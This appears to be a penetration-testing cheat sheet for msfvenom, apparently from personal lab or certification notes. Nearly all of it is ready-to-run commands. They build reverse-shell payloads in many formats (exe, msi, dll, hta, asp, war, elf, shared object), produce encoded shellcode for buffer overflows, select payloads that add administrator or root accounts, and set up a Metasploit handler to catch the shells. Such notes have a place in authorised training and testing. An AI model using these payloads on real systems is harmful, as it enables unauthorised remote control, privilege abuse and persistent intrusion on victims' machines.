Msfvenom

List payloads and formats

msfvenom --list payload
msfvenom --list format

Most used payloads

Windows - x86 - exe

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.233 LPORT=21 -f exe -o binary.exe

Windows - x64 - exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.233 LPORT=21 -f exe -o binary.exe

Windows - x64- .msi

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi

Windows - .dll

msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.184 LPORT=445

Windows - .hta

sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.138 LPORT=4444 -f hta-psh -o evil.hta

Windows - .asp

Useful when the webserver is Microsoft IIS. Also, try extension .aspx and .aspx-exe

msfvenom -p windows/shell_reverse_tcp -f asp LHOST=10.10.16.8 LPORT=4444 -o reverse-shell.asp

.war (java/jsp)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=80 -f war > shell.war

Linux-x86 - elf

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.151 LPORT=80 -f elf -o shell.elf

Linux - x64-elf-so

msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=192.168.130.21 LPORT=80

Pour les Buffers Overflow

Windows - .c

The flag -e is to specify the encoding.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.218 LPORT=80 EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -f c -e x86/alpha_mixed

Others payloads

cmd/windows/adduser # Create a new user and add them to local administration group
linux/x86/adduser   # Create a new user with UID 0
windows/adduser     # Create a new user and add them to local administration group

Handlers for staged payloads

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp #to be changed according to the staged payload generated
set LPORT <port>
set LHOST <ip>
exploit -j # to put in background
PreviousncNextnishang

Last updated